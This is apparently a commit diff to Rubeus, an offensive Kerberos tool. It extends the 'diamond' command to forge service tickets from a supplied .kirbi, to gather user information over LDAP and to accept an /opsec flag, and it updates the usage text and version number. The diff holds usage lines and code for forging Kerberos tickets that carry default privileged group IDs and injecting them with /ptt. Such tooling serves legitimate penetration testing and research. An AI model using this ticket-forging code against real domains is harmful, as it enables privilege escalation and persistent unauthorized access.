recutting_diamond

README.md

@@ -83,7 +83,7 @@ Rubeus is licensed under the BSD 3-Clause license.
       | |  \ \| |_| | |_) ) ____| |_| |___ |
       |_|   |_|____/|____/|_____)____/(___/
 
-      v2.3.3
+      v2.3.4
 
 
      Ticket requests and renewals:
@@ -179,6 +179,12 @@ Rubeus is licensed under the BSD 3-Clause license.
 		Forge a diamond TGT by requesting a TGT using tgtdeleg:
 			Rubeus.exe diamond /tgtdeleg [/createnetonly:C:\Windows\System32\cmd.exe] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/krbkey:HASH] [/ticketuser:USERNAME] [/ticketuserid:USER_ID] [/groups:GROUP_IDS] [/sids:EXTRA_SIDS]
 
+        Forge a diamond ticket using LDAP to gather the relevent information:
+            Rubeus.exe diamond /user:USER /password:PASSWORD </krbkey:HASH> /ldap /ldapuser:USER /ldappassword:PASSWORD [/ticketuser:USERNAME] [/ticketuserid:USER_ID] [/dc:DOMAIN_CONTROLLER] [/domain:DOMAIN] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec]
+
+        Forge a diamond service ticket:
+            Rubeus/exe diamond </ticket:BASE64 | /ticket:FILE.KIRBI> /service:SPN /servicekey:HASH [/ldap] [/ldapuser:USER] [/ldappassword:PASSWORD] [/ticketuser:USERNAME] [/ticketuserid:USER_ID] [/dc:DOMAIN_CONTROLLER] [/domain:DOMAIN] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec]
+
 
      Ticket management:
 

Rubeus/Commands/Diamond.cs

@@ -22,15 +22,22 @@ public void Execute(Dictionary<string, string> arguments)
             string outfile = "";
             string certificate = "";
             string krbKey = "";
+            string serviceKey = "";
             string ticketUser = "";
-            string groups = "520,512,513,519,518";
+            string groups = "";
             int ticketUserId = 0;
             string sids = "";
 
+            bool opsec = arguments.ContainsKey("/opsec");
             bool ptt = arguments.ContainsKey("/ptt");
+            bool ldap = arguments.ContainsKey("/ldap");
+            if (!ldap) { groups = "520,512,513,519,518"; };
+            string ldapuser = null;
+            string ldappassword = null;
             bool tgtdeleg = arguments.ContainsKey("/tgtdeleg");
             LUID luid = new LUID();
             Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;
+            KRB_CRED kirbi = null;
 
             if (arguments.ContainsKey("/user"))
             {
@@ -49,6 +56,10 @@ public void Execute(Dictionary<string, string> arguments)
             {
                 domain = arguments["/domain"];
             }
+            if (arguments.ContainsKey("/opsec"))
+            {
+                opsec = true;
+            }
             if (arguments.ContainsKey("/dc"))
             {
                 dc = arguments["/dc"];
@@ -62,16 +73,24 @@ public void Execute(Dictionary<string, string> arguments)
                 sids = arguments["/sids"];
             }
             encType = Interop.KERB_ETYPE.rc4_hmac; //default is non /enctype is specified
-            if (arguments.ContainsKey("/enctype")) {
+            if (arguments.ContainsKey("/enctype"))
+            {
                 string encTypeString = arguments["/enctype"].ToUpper();
 
-                if (encTypeString.Equals("RC4") || encTypeString.Equals("NTLM")) {
+                if (encTypeString.Equals("RC4") || encTypeString.Equals("NTLM"))
+                {
                     encType = Interop.KERB_ETYPE.rc4_hmac;
-                } else if (encTypeString.Equals("AES128")) {
+                }
+                else if (encTypeString.Equals("AES128"))
+                {
                     encType = Interop.KERB_ETYPE.aes128_cts_hmac_sha1;
-                } else if (encTypeString.Equals("AES256") || encTypeString.Equals("AES")) {
+                }
+                else if (encTypeString.Equals("AES256") || encTypeString.Equals("AES"))
+                {
                     encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
-                } else if (encTypeString.Equals("DES")) {
+                }
+                else if (encTypeString.Equals("DES"))
+                {
                     encType = Interop.KERB_ETYPE.des_cbc_md5;
                 }
             }
@@ -123,18 +142,24 @@ public void Execute(Dictionary<string, string> arguments)
                 hash = arguments["/aes256"];
                 encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
             }
-
-            if (arguments.ContainsKey("/certificate")) {
+
+            if (arguments.ContainsKey("/certificate"))
+            {
                 certificate = arguments["/certificate"];
             }
-            if (arguments.ContainsKey("/krbkey")) {
+            if (arguments.ContainsKey("/krbkey"))
+            {
                 krbKey = arguments["/krbkey"];
             }
+            if (arguments.ContainsKey("/servicekey"))
+            {
+                serviceKey = arguments["/servicekey"];
+            }
             if (arguments.ContainsKey("/ticketuser"))
             {
                 ticketUser = arguments["/ticketuser"];
             }
-            if (arguments.ContainsKey("/groups")) 
+            if (arguments.ContainsKey("/groups"))
             {
                 groups = arguments["/groups"];
             }
@@ -176,27 +201,75 @@ public void Execute(Dictionary<string, string> arguments)
                 Console.WriteLine();
             }
 
-           if (tgtdeleg)
-           {
+            // getting the user information from LDAP
+            if (arguments.ContainsKey("/ldap"))
+            {
+                ldap = true;
+                if (arguments.ContainsKey("/creduser"))
+                {
+                    if (!arguments.ContainsKey("/credpassword"))
+                    {
+                        Console.WriteLine("\r\n[X] /credpassword is required when specifying /creduser\r\n");
+                        return;
+                    }
+
+                    ldapuser = arguments["/creduser"];
+                    ldappassword = arguments["/credpassword"];
+                }
+
+                if (String.IsNullOrEmpty(domain))
+                {
+                    domain = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain().Name;
+                }
+            }
+
+            if (arguments.ContainsKey("/ticket"))
+            {
+                string kirbi64 = arguments["/ticket"];
+
+                if (Helpers.IsBase64String(kirbi64))
+                {
+                    byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
+                    kirbi = new KRB_CRED(kirbiBytes);
+                }
+                else if (File.Exists(kirbi64))
+                {
+                    byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
+                    kirbi = new KRB_CRED(kirbiBytes);
+                }
+                else
+                {
+                    Console.WriteLine("\r\n[X] /ticket:X must either be a .kirbi file or a base64 encoded .kirbi\r\n");
+                }
+            }
+
+            if (tgtdeleg)
+            {
                 KRB_CRED cred = null;
-                try {
+                try
+                {
                     cred = new KRB_CRED(LSA.RequestFakeDelegTicket());
                 }
-                catch {
+                catch
+                {
                     Console.WriteLine("[X] Unable to retrieve TGT using tgtdeleg");
                     return;
                 }
-                ForgeTickets.ModifyTicket(cred, krbKey, krbKey, outfile, ptt, luid, ticketUser, groups, ticketUserId, sids);
+                ForgeTickets.ModifyTicket(cred, krbKey, krbKey, outfile, ldap, ldapuser, ldappassword, dc, domain, ptt, luid, ticketUser, groups, ticketUserId, sids);
+            }
+            else if (null!=kirbi)
+            {
+                ForgeTickets.ModifyTicket(kirbi, serviceKey, krbKey, outfile, ldap, ldapuser, ldappassword, dc, domain, ptt, luid, ticketUser, groups, ticketUserId, sids);
             }
             else
             {
                 if (String.IsNullOrEmpty(certificate))
-                    ForgeTickets.DiamondTicket(user, domain, hash, encType, outfile, ptt, dc, luid, krbKey, ticketUser, groups, ticketUserId, sids);
+                    ForgeTickets.DiamondTicket(user, domain, hash, encType, outfile, opsec, ldap, ptt, ldapuser, ldappassword, dc, luid, krbKey, ticketUser, groups, ticketUserId, sids);
                 else
-                    ForgeTickets.DiamondTicket(user, domain, certificate, password, encType, outfile, ptt, dc, luid, krbKey, ticketUser, groups, ticketUserId, sids);
+                    ForgeTickets.DiamondTicket(user, domain, certificate, password, encType, outfile, opsec, ldap, ptt, ldapuser, ldappassword, dc, luid, krbKey, ticketUser, groups, ticketUserId, sids);
             }
-
+            
             return;
         }
     }
-}
+}

Rubeus/Commands/Kirbi.cs

@@ -96,7 +96,7 @@ public void Execute(Dictionary<string, string> arguments)
                 }
             }
 
-            ForgeTickets.ModifyKirbi(kirbi, sessionKey, sessionKeyEtype, ptt, luid, outfile);
+            ForgeTickets.ModifyTicket(kirbi, sessionKey:sessionKey, sessionKeyEtype:sessionKeyEtype, ptt:ptt, luid:luid, outfile:outfile); 
         }
     }
 }

Rubeus/Domain/CommandCollection.cs

@@ -54,12 +54,12 @@ public bool ExecuteCommand(string commandName, Dictionary<string, string> argume
             bool commandWasFound;
 
             if (string.IsNullOrEmpty(commandName) || _availableCommands.ContainsKey(commandName) == false)
-                commandWasFound= false;
+                commandWasFound = false;
             else
             {
                 // Create the command object 
                 var command = _availableCommands[commandName].Invoke();
-                
+
                 // and execute it with the arguments from the command line
                 command.Execute(arguments);
 

Rubeus/Domain/Info.cs

@@ -12,7 +12,7 @@ public static void ShowLogo()
             Console.WriteLine("  |  __  /| | | |  _ \\| ___ | | | |/___)");
             Console.WriteLine("  | |  \\ \\| |_| | |_) ) ____| |_| |___ |");
             Console.WriteLine("  |_|   |_|____/|____/|_____)____/(___/\r\n");
-            Console.WriteLine("  v2.3.3 \r\n");
+            Console.WriteLine("  v2.3.4 \r\n");
         }
 
         public static void ShowUsage()
@@ -100,14 +100,19 @@ public static void ShowUsage()
         Rubeus.exe silver </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </service:SPN> </domain:DOMAIN> </sid:DOMAIN_SID> [/dc:DOMAIN_CONTROLLER] [/netbios:NETBIOS_DOMAIN] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/authdata] [/cname:CLIENTNAME] [/crealm:CLIENTDOMAIN] [/s4uproxytarget:TARGETSPN] [/s4utransitedservices:SPN1,SPN2,...] [/extendedupndns] [/nofullpacsig] [/printcmd] [outfile:FILENAME] [/ptt]
 
     Forge a diamond TGT by requesting a TGT based on a user password/hash:
-        Rubeus.exe diamond /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/createnetonly:C:\Windows\System32\cmd.exe] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/krbkey:HASH] [/ticketuser:USERNAME] [/ticketuserid:USER_ID] [/groups:GROUP_IDS] [/sids:EXTRA_SIDS]
+        Rubeus.exe diamond /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/createnetonly:C:\Windows\System32\cmd.exe] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/krbkey:HASH] [/ticketuser:USERNAME] [/ticketuserid:USER_ID] [/groups:GROUP_IDS] [/sids:EXTRA_SIDS] [/opsec]
 
     Forge a diamond TGT by requesting a TGT using a PCKS12 certificate:
-        Rubeus.exe diamond /user:USER /certificate:C:\temp\leaked.pfx </password:STOREPASSWORD> [/createnetonly:C:\Windows\System32\cmd.exe] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/krbkey:HASH] [/ticketuser:USERNAME] [/ticketuserid:USER_ID] [/groups:GROUP_IDS] [/sids:EXTRA_SIDS]
+        Rubeus.exe diamond /user:USER /certificate:C:\temp\leaked.pfx </password:STOREPASSWORD> [/createnetonly:C:\Windows\System32\cmd.exe] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/krbkey:HASH] [/ticketuser:USERNAME] [/ticketuserid:USER_ID] [/groups:GROUP_IDS] [/sids:EXTRA_SIDS] [/opsec]
 
-     Forge a diamond TGT by requesting a TGT using tgtdeleg:
-        Rubeus.exe diamond /tgtdeleg [/createnetonly:C:\Windows\System32\cmd.exe] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/krbkey:HASH] [/ticketuser:USERNAME] [/ticketuserid:USER_ID] [/groups:GROUP_IDS] [/sids:EXTRA_SIDS]
-
+    Forge a diamond TGT by requesting a TGT using tgtdeleg:
+        Rubeus.exe diamond /tgtdeleg [/createnetonly:C:\Windows\System32\cmd.exe] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/krbkey:HASH] [/ticketuser:USERNAME] [/ticketuserid:USER_ID] [/groups:GROUP_IDS] [/sids:EXTRA_SIDS] [/opsec]
+
+    Forge a diamond ticket using LDAP to gather the relevent information:
+        Rubeus.exe diamond /user:USER /password:PASSWORD </krbkey:HASH> /ldap /ldapuser:USER /ldappassword:PASSWORD [/ticketuser:USERNAME] [/ticketuserid:USER_ID] [/dc:DOMAIN_CONTROLLER] [/domain:DOMAIN] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec]
+
+    Forge a diamond service ticket:
+        Rubeus/exe diamond </ticket:BASE64 | /ticket:FILE.KIRBI> /service:SPN /servicekey:HASH [/ldap] [/ldapuser:USER] [/ldappassword:PASSWORD] [/ticketuser:USERNAME] [/ticketuserid:USER_ID] [/dc:DOMAIN_CONTROLLER] [/domain:DOMAIN] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec]
 
  Ticket management:
 

Rubeus/Rubeus.csproj

@@ -246,4 +246,4 @@
   <Target Name="AfterBuild">
   </Target>
   -->
-</Project>
+</Project>